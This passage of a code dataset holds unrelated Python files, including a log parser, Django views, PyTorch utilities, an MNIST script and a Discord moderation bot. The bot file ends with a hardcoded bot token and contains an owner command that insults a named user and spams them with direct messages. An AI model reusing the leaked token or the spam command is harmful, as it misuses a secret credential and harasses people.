ids.')\n\tprint('Uniprot has '+str(len(hash_mgiids_infile4))+' MGI ids.')\n\nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"dtian09/Python-tools-to-analyse-genetic-data","sub_path":"get_mgiids.py","file_name":"get_mgiids.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"29288403794","text":"import itertools as it\nfrom typing import List, Dict, Callable\nfrom datetime import datetime\nfrom functools import lru_cache\n\nimport requests\n\nimport data_wrappers as dw\nimport logger\nfrom data_wrappers import Serializable\nfrom log_mapper.marker import MarkedToken\nfrom log_mapper.tokenizer import Token\nfrom log_mapper.QueryType import QueryType\n\n\nTokenGroups = Dict[str, List[MarkedToken]]\n\n\ndef __extract_datetime(token: Token) -> datetime:\n return datetime.strptime(token['date'] + ' ' + token['time'], '%Y-%m-%d %H:%M:%S')\n\n\n@lru_cache(maxsize=256)\ndef __extract_country(ip_address: str) -> str:\n logger.log_trace(f'Searching for user\\'s country by ip {ip_address}...')\n try:\n response = requests.get('http://ipinfo.io/json')\n return response.json()['country']\n except Exception as error:\n logger.log_warning(str(error))\n\n return ''\n\n\ndef __get_category_name(query: str) -> str:\n assert len(query.replace('https://', '').split('/')) >= 2, f'Got unexpected query: {query}'\n return query.replace('https://', '').split('/')[1]\n\n\ndef __get_goods_name(query: str) -> str:\n assert len(query.replace('https://', '').split('/')) >= 3, f'Got unexpected query: {query}'\n return query.replace('https://', '').split('/')[2]\n\n\ndef group_by_ip(marked_tokens: List[MarkedToken]) -> TokenGroups:\n marked_tokens = sorted(marked_tokens, key=lambda x: x[1]['ip'])\n return {ip: list(tokens) for ip, tokens in it.groupby(marked_tokens, key=lambda x: x[1]['ip'])}\n\n\ndef parse(groups: TokenGroups, logging_callback: Callable[[str], None] = None) -> List[Serializable]:\n total_lines_count = sum(len(group) for group in groups.values())\n current_line: int = 1\n queries_count: int = 0\n categories_visits_count: int = 0\n categories_count: int = 0\n transactions_count: int = 0\n transaction_items_count: int = 0\n active_carts: Dict[int, dw.Cart] = {}\n active_users: Dict[int, dw.User] = {}\n active_goods: Dict[int, dw.Goods] = {}\n categories_names: List[str] = []\n result: List[Serializable] = []\n for ip in groups.keys():\n for token_num, (token_type, token) in enumerate(groups[ip]):\n logger.log_trace(f'Line {current_line}/{total_lines_count}')\n\n if token_type == QueryType.CATEGORY:\n category_name = __get_category_name(token['query'])\n if category_name not in categories_names:\n category_id = categories_count\n\n category = dw.Category(category_id, category_name)\n categories_names.append(category_name)\n result.append(category)\n categories_count += 1\n else:\n category_id = categories_names.index(category_name)\n\n visit = dw.CategoriesVisit(\n categories_visits_count, category_id, __extract_datetime(token),\n token['ip'], __extract_country(token['ip'])\n )\n result.append(visit)\n categories_visits_count += 1\n elif token_type == QueryType.ADDITION:\n params = token['query'].split('?')[1].split('&') # [goods_id=n, amount=m,cart_id=r]\n goods_id = int(params[0].split('=')[1])\n amount = int(params[1].split('=')[1])\n cart_id = int(params[2].split('=')[1])\n if goods_id not in active_goods.keys():\n previous_query = groups[ip][token_num - 1][1]['query']\n category_id = categories_names.index(__get_category_name(previous_query))\n goods = dw.Goods(goods_id, category_id, __get_goods_name(previous_query))\n\n active_goods[goods_id] = goods\n result.append(goods)\n\n if cart_id not in active_carts.keys():\n cart = dw.Cart(cart_id, {})\n cart.goods_amount[goods_id] = amount\n active_carts[cart_id] = cart\n elif goods_id in active_carts[cart_id].goods_amount.keys():\n active_carts[cart_id].goods_amount[goods_id] += amount\n else:\n active_carts[cart_id].goods_amount[goods_id] = amount\n elif token_type == QueryType.PAYMENT:\n params = token['query'].split('?')[1].split('&') # [user_id=n, cart_id=m]\n user_id = int(params[0].split('=')[1])\n cart_id = int(params[1].split('=')[1])\n if cart_id not in active_carts.keys():\n logger.log_error(f'Payment on non-existent cart {cart_id} detected. Skipping to the next query...')\n query = dw.Query(queries_count, token['ip'], token['query'], __extract_datetime(token))\n result.append(query)\n queries_count += 1\n continue\n\n if user_id not in active_users.keys():\n user = dw.User(user_id, 'Unknown', token['ip'], __extract_country(token['ip']), 1, 1)\n active_users[user_id] = user\n result.append(user) # this value will be changing via pointer in \"active_users\"\n else:\n active_users[user_id].visits_count += 1\n active_users[user_id].carts_count += 1\n active_users[user_id].last_ip = token['ip']\n\n transaction = dw.Transaction(transactions_count, user_id, __extract_datetime(token))\n transaction_items = []\n for goods_id, amount in active_carts[cart_id].goods_amount.items():\n transaction_item = dw.TransactionGoods(\n transaction_items_count, transactions_count, goods_id, amount\n )\n transaction_items_count += 1\n transaction_items.append(transaction_item)\n transactions_count += 1\n result.append(transaction)\n '''all transaction items should be added after transaction to satisfy db integrity'''\n result.extend(transaction_items)\n\n active_users[user_id].payments_count += 1\n del active_carts[cart_id] # this cart is used\n\n query = dw.Query(queries_count, token['ip'], token['query'], __extract_datetime(token))\n result.append(query)\n queries_count += 1\n\n current_line += 1\n\n result.extend(active_carts.values())\n if logging_callback is not None:\n logging_callback(\n f'Parsing completed, created {len(result)} wrappers.'\n )\n return result\n","repo_name":"Borstch/all_to_the_bottom_analysis","sub_path":"log_mapper/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13704867858","text":"def rotate_matrix(matrix):\n if len(matrix) == 0:\n return matrix\n if len(matrix) != len(matrix[0]):\n raise Exception(\"Matrix is not valid for rotation\")\n\n dimension = len(matrix)\n for i in range(dimension-1):\n start_idx = (0, i)\n tmp = matrix[start_idx[0]][start_idx[1]]\n for j in range(4):\n next_idx = (start_idx[1], dimension-1-start_idx[0])\n num = tmp\n tmp = matrix[next_idx[0]][next_idx[1]]\n matrix[next_idx[0]][next_idx[1]] = num\n start_idx = next_idx\n\n\nif __name__ == \"__main__\":\n\n matrix = [[0] * 3 for i in range(3)]\n\n matrix[0][1] = 1\n matrix[0][2] = 2\n matrix[1][0] = 3\n matrix[1][1] = 4\n matrix[1][2] = 5\n matrix[2][0] = 6\n matrix[2][1] = 7\n matrix[2][2] = 8\n\n rotate_matrix(matrix)\n\n print(matrix)\n\n matrix = []\n print(matrix)\n\n matrix = [[0] * 2 for i in range(4)]\n rotate_matrix(matrix)\n","repo_name":"yjw9012/cracking-the-coding-interview","sub_path":"chapter-1/1.7-rotate_matrix.py","file_name":"1.7-rotate_matrix.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"696030640","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Document, DocumentCategory, SubCategory\nfrom .forms import DocumentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nimport os\nfrom django.core.files.storage import default_storage\n\n@login_required\ndef upload_document(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n document = form.save(commit=False)\n document.author = request.user # Set the author to the currently logged-in user\n document.save()\n form.save_m2m()\n return redirect('documents:document_list')\n else:\n form = DocumentForm()\n\n return render(request, 'documents/upload_document.html', {'form': form})\n\n@login_required\ndef document_list(request):\n categories = DocumentCategory.objects.all()\n return render(request, 'documents/document_list.html', {'categories': categories})\n\n@login_required\ndef download_document(request, document_id):\n document = get_object_or_404(Document, id=document_id)\n # Perform any permission checks here, if necessary\n return document.file.serve(request, document.file.name)\n\n@login_required\ndef delete_document(request, document_id):\n document = get_object_or_404(Document, id=document_id)\n # Perform any permission checks here, if necessary\n document.file.delete()\n document.delete()\n return redirect('documents:document_list')\n\n@login_required\ndef category_detail(request, category_id):\n category = get_object_or_404(DocumentCategory, id=category_id, groups__in=request.user.groups.all())\n categories = DocumentCategory.objects.all()\n return render(request, 'documents/category_detail.html', {'category': category, 'categories': categories})\n\n@login_required\ndef subcategory_detail(request, subcategory_id):\n try:\n subcategory = SubCategory.objects.get(id=subcategory_id)\n documents = Document.objects.filter(subcategory=subcategory)\n return render(request, 'documents/subcategory_detail.html', {'subcategory': subcategory, 'documents': documents})\n except SubCategory.DoesNotExist:\n return render(request, 'documents/subcategory_not_found.html')\n\ndef get_subcategories(request):\n category_id = request.GET.get('category_id')\n subcategories = SubCategory.objects.filter(category_id=category_id).values('id', 'name')\n return JsonResponse({'subcategories': list(subcategories)})\n\n\n","repo_name":"elikibula/fijibati-document-app","sub_path":"documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29663145003","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Developed by andy\r\n\r\nimport os\r\nimport sys\r\nimport torch\r\nimport numpy as np\r\nfrom datetime import datetime as dt\r\nfrom config import cfg\r\nimport torch.nn.functional as F\r\n\r\nimport cv2\r\n\r\ndef mkdir(path):\r\n if not os.path.isdir(path):\r\n mkdir(os.path.split(path)[0])\r\n else:\r\n return\r\n os.mkdir(path)\r\n\r\ndef var_or_cuda(x):\r\n if torch.cuda.is_available():\r\n x = x.cuda(non_blocking=True)\r\n return x\r\n\r\n\r\ndef init_weights_xavier(m):\r\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):\r\n torch.nn.init.xavier_uniform_(m.weight)\r\n if m.bias is not None:\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.BatchNorm2d or type(m) == torch.nn.InstanceNorm2d:\r\n if m.weight is not None:\r\n torch.nn.init.constant_(m.weight, 1)\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.Linear:\r\n torch.nn.init.normal_(m.weight, 0, 0.01)\r\n torch.nn.init.constant_(m.bias, 0)\r\n\r\ndef init_weights_kaiming(m):\r\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):\r\n torch.nn.init.kaiming_normal_(m.weight)\r\n if m.bias is not None:\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.BatchNorm2d or type(m) == torch.nn.InstanceNorm2d:\r\n if m.weight is not None:\r\n torch.nn.init.constant_(m.weight, 1)\r\n torch.nn.init.constant_(m.bias, 0)\r\n elif type(m) == torch.nn.Linear:\r\n torch.nn.init.normal_(m.weight, 0, 0.01)\r\n torch.nn.init.constant_(m.bias, 0)\r\n\r\n\r\ndef save_deblur_checkpoints(file_path, epoch_idx, deblurnet, deblurnet_solver, Best_Img_PSNR, Best_Epoch):\r\n print('[INFO] %s Saving checkpoint to %s ...\\n' % (dt.now(), file_path))\r\n checkpoint = {\r\n 'epoch_idx': epoch_idx,\r\n 'Best_Img_PSNR': Best_Img_PSNR,\r\n 'Best_Epoch': Best_Epoch,\r\n 'deblurnet_state_dict': deblurnet.state_dict(),\r\n 'deblurnet_solver_state_dict': deblurnet_solver.state_dict(),\r\n }\r\n torch.save(checkpoint, file_path)\r\n\r\ndef save_checkpoints(file_path, epoch_idx, dispnet, dispnet_solver, deblurnet, deblurnet_solver, Disp_EPE, Best_Img_PSNR, Best_Epoch):\r\n print('[INFO] %s Saving checkpoint to %s ...' % (dt.now(), file_path))\r\n checkpoint = {\r\n 'epoch_idx': epoch_idx,\r\n 'Disp_EPE': Disp_EPE,\r\n 'Best_Img_PSNR': Best_Img_PSNR,\r\n 'Best_Epoch': Best_Epoch,\r\n 'dispnet_state_dict': dispnet.state_dict(),\r\n 'dispnet_solver_state_dict': dispnet_solver.state_dict(),\r\n 'deblurnet_state_dict': deblurnet.state_dict(),\r\n 'deblurnet_solver_state_dict': deblurnet_solver.state_dict(),\r\n }\r\n torch.save(checkpoint, file_path)\r\n\r\ndef count_parameters(model):\r\n return sum(p.numel() for p in model.parameters())\r\n\r\ndef get_weight_parameters(model):\r\n return [param for name, param in model.named_parameters() if ('weight' in name)]\r\n\r\ndef get_bias_parameters(model):\r\n return [param for name, param in model.named_parameters() if ('bias' in name)]\r\n\r\nclass AverageMeter(object):\r\n \"\"\"Computes and stores the average and current value\"\"\"\r\n def __init__(self):\r\n self.reset()\r\n\r\n def reset(self):\r\n # print(\"reset:\\n\")\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\n def __repr__(self):\r\n return '{:.5f} ({:.5f})'.format(self.val, self.avg)\r\n\r\n'''input Tensor: 2 H W'''\r\ndef graybi2rgb(graybi):\r\n assert(isinstance(graybi, torch.Tensor))\r\n global args\r\n _, H, W = graybi.shape\r\n rgb_1 = torch.zeros((3,H,W))\r\n rgb_2 = torch.zeros((3,H,W))\r\n normalized_gray_map = graybi / (graybi.max())\r\n rgb_1[0] = normalized_gray_map[0]\r\n rgb_1[1] = normalized_gray_map[0]\r\n rgb_1[2] = normalized_gray_map[0]\r\n\r\n rgb_2[0] = normalized_gray_map[1]\r\n rgb_2[1] = normalized_gray_map[1]\r\n rgb_2[2] = normalized_gray_map[1]\r\n return rgb_1.clamp(0,1), rgb_2.clamp(0,1)\r\n\r\ndef multiScaleImage(img):\r\n ans = []\r\n ans.append(img)\r\n downsample1 = F.interpolate(img, scale_factor=0.5)\r\n downsample2 = F.interpolate(img, scale_factor=0.25)\r\n ans.append(downsample1)\r\n ans.append(downsample2)\r\n return ans\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"andycor/Multi-scale-Grid-Network-for-Image-Deblurring-with-High-frequency-Guidance","sub_path":"utils/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"70287989911","text":"import os\nimport random\nimport nextcord\nfrom nextcord.ext import commands\n# from nextcord.utils import get\nfrom nextcord import ButtonStyle\nfrom nextcord.ui import Button, View, Modal, Select\nfrom dotenv import load_dotenv\nload_dotenv(dotenv_path=\"config\")\n\nintents = nextcord.Intents.default()\nintents.presences = True\nintents.members = True\nintents.typing = True\nintents.message_content = True\n\nclient = nextcord.Client(intents=intents)\n\nliste_mot_blacklist = [\n \"test\"\n]\n\nreponse_gros_mots = [\n \"Oh ton langage {} ! C'est pas la cité ici donc parle bien.\",\n \"Tu parles mal {} il va falloir te calmer !\",\n \"Tu es bien grossier dis donc {} !\",\n \"Orhhhhhhh {} je vais devoir te dire combien de fois de te calmer !?\"\n]\n\n\nchannel_cible = 1091449953047543852\n\n@client.event\nasync def on_ready():\n print(\"En ligne\")\n\n@client.event\nasync def on_message(message: nextcord.Message):\n for mot_blacklist in liste_mot_blacklist:\n if mot_blacklist in message.content.lower():\n print(\"insulte présent\")\n await message.reply(random.choice(reponse_gros_mots).format(message.author.mention))\n await message.delete()\n return\n\n elif \"@everyone\" in message.content.lower() and channel_cible not in [i.id for i in message.author.roles]: # type: ignore\n print(\"@everyone présent\")\n await message.reply(f\"{message.author.mention} ne mentionne pas tout le monde s'il te plait ça dérange tout le monde...\")\n await message.delete()\n return\n\n \n\n if message.content.split(\" \")[-1].lower() == \"quoi\":\n await message.reply(\"FEUR !\")\n return\n\n if channel_cible in [i.id for i in message.author.roles]: #MESSAGE OWNER\n if message.content.lower().startswith(\"ftg\"):\n pseudo = message.content.split(\" \")[-1]\n pseudo = client.get_user(int(pseudo[2:-1]))\n\n await message.channel.send(f\"C'est réel {pseudo.mention} ftg arrête d'aboyer.\")\n await pseudo.send(f\"T'as intérêt à te calmer dans le serveur {pseudo.mention} parce que là tu clc en vrai. Donc tg stp.\")\n for _ in range(7):\n await pseudo.send(f\"C'est un mini spam de prévention {pseudo.mention}, je peux aller jusqu'à ... BEAUCOUP !!\")\n\n \n elif message.content.lower().startswith(\"fais taire\"):\n pass\n \n elif message.content.lower().startswith(\"Arrête d'aboyer\"):\n pass\n\n# bot.run(os.getenv(\"TOKEN\"))\nclient.run(\"MTA5MTQ0ODYwNTg3OTA0MjEyNg.GIYSE6.DGcMh33Ksv_Z4VGVpkJGPw2lU9ejcqD1S-QcS0\")","repo_name":"DevJ2K/ProjetSoftwareDiscord","sub_path":"flask/botDiscord/botModerateur.py","file_name":"botModerateur.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39171065666","text":"import yaml\nfrom .Request import Request\nfrom .RequestRunner import RequestRunner\nfrom .Response import Response\n\nclass Script():\n\n '''\n @brief init script\n '''\n def __init__(self): \n self.__on_auto_request = None\n self.__reqs=[]\n self.__runners=[]\n self.__resps=[]\n self.__buff=[]\n self.__maxseq=0\n '''\n @brief set on auto request\n @param[IN] on_auto_request on request send callback\n '''\n def setOnAutoRequest(self, on_auto_request): \n self.__on_auto_request = on_auto_request\n \n '''\n @brief load script from file\n @param[IN] filename the file name\n '''\n def load(self, filename):\n f=open(filename, \"r\")\n root = yaml.load(f, Loader=yaml.FullLoader)\n reqs = root.get(\"reqs\", [])\n resps = root.get(\"resps\", [])\n for req in reqs:\n r=Request()\n r.load(req)\n self.__reqs.append(r)\n if r.Period():\n self.__runners.append(RequestRunner(r, self.onPeriod))\n for resp in resps:\n r=Response()\n r.load(resp)\n s=len(r)\n if self.__maxseq < s:\n self.__maxseq = s\n self.__resps.append(r)\n \n '''\n @brief start runners for all request\n '''\n def start(self):\n for r in self.__runners: \n r.start()\n \n '''\n @brief on runner period hit\n @param[IN] runner the RequestRunner\n @param[IN] data the data sequence to send\n '''\n def onPeriod(self, runner, data):\n if self.__on_auto_request : \n return self.__on_auto_request(data)\n return False\n \n '''\n @brief compute input data\n @return data to send or None\n '''\n def Compute(self, data):\n self.__buff += data\n if len(self.__buff)>self.__maxseq:\n self.__buff.pop(0)\n for resp in self.__resps:\n if resp == self.__buff:\n self.__buff=[]\n return self.Run(resp.Run())\n return None\n \n '''\n @brief run request\n @param[IN] title the request title\n @return data to send or None\n '''\n def Run(self, title):\n for r in self.__reqs:\n if r == title :\n return r.Seq()\n return None\n \n '''\n @brief string\n @return string\n '''\n def __str__(self):\n st = \"Requests :\"\n for req in self.__reqs:\n st += \"\\n\\t\"+str(req)\n st += \"\\nResponses :\"\n for resp in self.__resps:\n st += \"\\n\\t\"+str(resp)\n return st\n ","repo_name":"technosvitman/PyT1000","sub_path":"script/Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13325960021","text":"import argparse\r\nimport getpass\r\nfrom mcod_prep.utils.mcod_cluster_tools import submit_mcod\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description=\"Launcher for map_spec_drug_bug.py\")\r\n parser.add_argument(\"source\", nargs=\"+\")\r\n write_parser = parser.add_mutually_exclusive_group(required=True)\r\n write_parser.add_argument(\r\n '--write', dest='write', action='store_true',\r\n help='Write the output file from mapping '\r\n '(only use once your cleaning script has been approved)'\r\n )\r\n write_parser.add_argument(\r\n '--no-write', dest='write', action='store_false',\r\n help='Do not write the output file from mapping (used for testing purposes)'\r\n )\r\n args = parser.parse_args()\r\n assert {'all', 'new'}.isdisjoint(set(args.source)),\\\r\n \"The 'all' and 'new' options don't make sense in the launcher yet\"\r\n print(f\"Submitting jobs for sources {args.source}\")\r\n\r\n mem = {'SOURCE': \"200G\"}\r\n runtime = {'SOURCE': \"04:00:00\"}\r\n cores = {'SOURCE': 50}\r\n\r\n worker = \"FILEPATH\"\r\n for source in args.source:\r\n jobname = f\"map_amr_{source}\"\r\n submit_mcod(\r\n jobname, language='python', worker=worker,\r\n cores=cores.get(source, 1), memory=mem.get(source, \"10G\"),\r\n runtime=runtime.get(source, '00:30:00'),\r\n params=[source, '--write'], logging=True\r\n )\r\n","repo_name":"ihmeuw/amr","sub_path":"utils/launch_mapping.py","file_name":"launch_mapping.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"36651030537","text":"'''\nAuthor: Brian Mukeswe\nInstitution: The University of Edinburgh\nDepartment: School of Informatics\nContact: b.mukeswe@sms.ed.ac.uk\nDate: June 1, 2019 \n\nDescription: This script a joins a specified sample of weather data\n with surveyed happiness data based on area codes. \n The script reports correlations between each weather attribute\n and happiness metric, and writes the joined dataset to a specified \n file format i.e (either csv, xls, xlsx or standard output).\n The user can specify the following parameters:\n output: the format for reporting the joined dataset\n metrics: the metrics to use for correlation. options include the following\n (\"avg_rating\", \"happy\", \"unhappy\", \"low_0_4\", \"medium_5_6\", \"high_7_8\", \"vhigh_9_10\"\n features: The weather attributes to be included when reporting correlations.\n\n'''\n# import relevant libraries\nfrom pymongo import MongoClient\nimport pandas as pd\n# utilty functions\nfrom utility_scripts import classification_utils as part2_utils \nfrom utility_scripts import clustering_utils as part1_utils\nfrom utility_scripts import happiness_data_utils as utils\n\n## SETUP: user can specify input parameters here ##\noutput = 'xlsx' # choose from {'csv', 'xls', 'xlsx', 'standard'}\nmetrics = [\"avg_rating\", \"happy\", \"unhappy\"] # metrics to use for reporting corelations\nfeatures = [\"af_days\", \"rain_mm\", \"sun_hours\" , \"tmax_degC\",\"tmin_degC\"] # features to report\n\n\n## Get station location data ##\n# configure the database where the station data is stored\nserver = {\"host\":\"localhost\",\n \"port\":27017,\n \"dbName\":\"pitds_assessment3\",\n \"collection\":\"labeled_station_coords_3\"} # use the same database as part2\n\nclient = MongoClient(host=server[\"host\"], port=server[\"port\"])\ndb = client[server[\"dbName\"]]\ndatabase = db[server[\"collection\"]]\n\n# retrieve station coordinates\nstation_coords = part1_utils.query_to_dataframe({}, server[\"collection\"])\nprint(\"\\nRetrieved station coordinates\\n\")\nprint(station_coords.head(10))\n\n\n\n## Get happiness data from database##\nserver = {\"host\":\"localhost\",\n \"port\":27017,\n \"dbName\":\"pitds_assessment3\",\n \"collection\":\"happiness\"}\n\nhappiness = part1_utils.query_to_dataframe({}, server[\"collection\"])\nprint(\"\\nRetrieved shappiness data\\n\")\nprint(happiness.head(10))\n\n\n\n## Sample weather data\n# Get weather data for a specified sample year or set of sample years\nsample_years = [2018]\nseason = [1,2,3,4,5,6,7,8,9,10,11,12]\nweather = part1_utils.get_weather_data(sample_years=sample_years) \nweather = part1_utils.fill_missing_values(weather)\nweather = part1_utils.get_season_average(season, weather)\nprint(\"\\nRetrieved samplle weather data\\n\")\n\n\n## Join area codes with weather data and store new collection ##\nserver = {\"host\":\"localhost\",\n \"port\":27017,\n \"dbName\":\"pitds_assessment3\",\n \"collection\":\"weather_area\"}\n\ndatabase = db[server[\"collection\"]]\n\n# Join sampled weather data with area codes and store in a database collection\nweather_area = utils.join_weather_to_area_codes(weather, station_coords, happiness)\nutils.store_data(weather_area, database)\n\n\n## Aggregate weather data and happiness data using weather_area collection\n# specify aggregation details\nquery = [{\n '$lookup': {\n 'from': 'happiness', \n 'localField': 'area', \n 'foreignField': 'area_codes', \n 'as': 'happiness'\n }\n }\n ]\n\n# Join weather and happiness data\njoined = utils.aggregation_to_dataframe(query, database, station_coords)\n\n# Combine happiness metrics data into two categories happy and unhappy\nhappy = joined.high_7_8 + joined.vhigh_9_10\nhappy.name = \"happy\"\nunhappy = joined.low_0_4 + joined.medium_5_6\nunhappy.name = \"unhappy\"\njoined = pd.concat([joined,happy,unhappy], axis=1) \n\n\n# Report correlations\nutils.report_corelations(joined, features, metrics)\n \n# Report joined dataset\nif output == \"csv\":\n joined.to_csv(\"joined_data_set.csv\")\nelif output == \"standard\":\n print(joined)\nelse:\n joined.to_excel(\"joined_data_set.\"+output)\n \n","repo_name":"mukeswebrian/Analysing-the-impact-of-weather-on-self-reported-happiness","sub_path":"part3_joining_data.py","file_name":"part3_joining_data.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"26719171335","text":"# Programmers 괄호 회전하기 (level2)\n# 파라미터 s를 x번 (1<=x<=len(s)) 왼쪽으로 회전할 때 s가 옮은 문자열이 된 횟수를 출력하시오.\n# 옮은 문자열이란 \"()\", \"{}\", \"[]\"이며, 옮은 문자열이 A일 때, \"(A)\", \"{A}\", \"[A]\"도 옮은 문자열이며 A,B가 옳은 문자열일 때, AB 역시 옳은 문자열이다.\n\nimport collections\npartner = {\"(\" : \")\", \"[\" : \"]\", \"{\" : \"}\", \")\" : \"(\", \"]\" : \"[\", \"}\" : \"{\"}\npartner_sort = {\"(\" : \")\", \"[\" : \"]\", \"{\" : \"}\"}\n\ndef solution(s):\n # 1. Is partner (exist) and counted the same? \n s_dict = collections.Counter(s)\n for key, value in s_dict.items():\n if value != s_dict.get(partner.get(key)):\n return 0\n # 2. Is partner arrangement correct? (ex. \"(\" precedes \")\")\n answer = 0\n for i in range(len(s)):\n fail = False\n \n if i>0:\n s = s[1:] + s[0]\n \n for start, end in partner_sort.items():\n start_idx = s.find(start)\n if start_idx!=-1:\n end_idx = s.find(end)\n for j in range(s_dict.get(start)):\n \n if start_idx > end_idx:\n fail = True\n break\n \n start_idx = s.find(start, start_idx+1)\n end_idx = s.find(end, end_idx+1)\n \n if not fail:\n answer+=1\n \n return answer\n \n\n# 14 case 통과 못함\n","repo_name":"ChristinaROK/TIC","sub_path":"20210424.py","file_name":"20210424.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1811748486","text":"\"\"\"\nРазпознование цифр Mnist с помощью PyTorch.\n\nСмотрел примеры:\n\nhttps://github.com/pytorch/examples/tree/main/mnist_hogwild\n\nhttps://medium.com/@ramamurthi96/a-simple-neural-network-model-for-mnist-using-pytorch-4b8b148ecbdc\n\nhttps://machinelearningmastery.com/develop-your-first-neural-network-with-pytorch-step-by-step/\n\nhttps://www.kaggle.com/code/geekysaint/solving-mnist-using-pytorch/notebook\n\n\nНастройка pyint:\n\nhttps://gist.github.com/uuklanger/fe65dc6da9169c1585abad4ac2b0d268\n\nБыла проблема с matplotlib backend (Fedora 39)\nhttps://pygobject.readthedocs.io/en/latest/getting_started.html#fedora-getting-started\n\n1. sudo dnf install python3.11-devel\n2. pip3 install pycairo to build and install Pycairo\n3. pip3 install PyGObject to build and install PyGObject\n\n\nskip-connection:\nhttps://chautuankien.medium.com/skip-connection-and-explanation-of-resnet-afabe792346c\n\nhttps://discuss.pytorch.org/t/how-to-concatenate-layers-in-pytorch-similar-to-tf-keras-layers-concatenate/33736/6\n\nhttps://www.youtube.com/watch?v=5YPRbHYB5ME\n\"\"\"\nfrom typing import Tuple, Any, List\n\nimport os\n# import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport torch\n\nfrom torchvision import datasets, transforms\n\nfrom torch.utils.data import DataLoader\nfrom torch import optim, Tensor, nn\nfrom torch.nn.functional import one_hot\n\n# библиотеки для вывода информации о модели\nfrom torchsummary import summary as summary_1\nfrom torchinfo import summary as summary_2\n\nfrom prettytable import PrettyTable\n\nfrom SimpleModelWithSkipConnections import SimpleModelWithSkipConnections\n\n\ndef is_run_in_colab() -> bool:\n \"\"\"\n Питон работает в Колабе Google\n :return:\n \"\"\"\n\n if os.getenv(\"COLAB_RELEASE_TAG\"):\n return True\n return False\n\n\n# сохраним в переменную\nis_code_in_colab = is_run_in_colab()\n\nif is_code_in_colab:\n # позволит график обновлять\n from IPython import display\n\n\ndef create_model(norm=False, dropout=False, batch_norm=False):\n \"\"\"\n Создание модели\n :param batch_norm:\n Добавить слой BatchNorm\n :param dropout:\n Добавить слой Dropout\n :param norm:\n Добавить слой для нормализации данных\n :return: Модель\n \"\"\"\n model = nn.Sequential()\n model.append(nn.Flatten())\n\n if norm:\n model.append(nn.LayerNorm(784))\n\n model.append(nn.Linear(in_features=784, out_features=128))\n model.append(nn.ReLU())\n\n if batch_norm:\n model.append(nn.BatchNorm1d(num_features=128))\n\n if dropout:\n model.append(nn.Dropout(0.5))\n\n skip = nn.Linear(in_features=128, out_features=64)\n model.append(skip)\n model.append(nn.ReLU())\n\n if dropout:\n model.append(nn.Dropout(0.5))\n\n model.append(nn.Linear(in_features=64, out_features=10))\n model.append(nn.ReLU())\n\n model.append(nn.Sequential(skip, nn.ReLU()))\n\n if dropout:\n model.append(nn.Dropout(0.25))\n\n model.append(nn.Sigmoid())\n\n return model\n\n\ndef create_model_skip_con(norm=False, dropout=False, batch_norm=False):\n \"\"\"\n Создание модели со skip connection\n :param batch_norm:\n Добавить слой BatchNorm\n :param dropout:\n Добавить слой Dropout\n :param norm:\n Добавить слой для нормализации данных\n :return: Модель\n \"\"\"\n return SimpleModelWithSkipConnections(norm=norm, dropout=dropout, batch_norm=batch_norm)\n\n\ndef create_model_conv2d():\n \"\"\"\n Создание более сложной/тяжелой модели\n :return:\n \"\"\"\n model = new_model = nn.Sequential()\n\n model.append(nn.Conv2d(1, 32, kernel_size=(3, 3), stride=1, padding=0))\n model.append(nn.ReLU())\n model.append(nn.Conv2d(32, 32, kernel_size=(3, 3), stride=1, padding=0))\n model.append(nn.ReLU())\n model.append(nn.MaxPool2d((2, 2)))\n model.append(nn.Dropout(0.25))\n\n model.append(nn.Flatten())\n model.append(nn.Linear(32 * 12 * 12, 128))\n model.append(nn.ReLU())\n model.append(nn.Dropout(0.5))\n model.append(nn.Linear(in_features=128, out_features=10))\n model.append(nn.Softmax(dim=1))\n\n return new_model\n\n\ndef print_count_parameters(model) -> int:\n \"\"\"\n Summary of model\n :param model:\n Model\n :return:\n Total Trainable Params\n \"\"\"\n table = 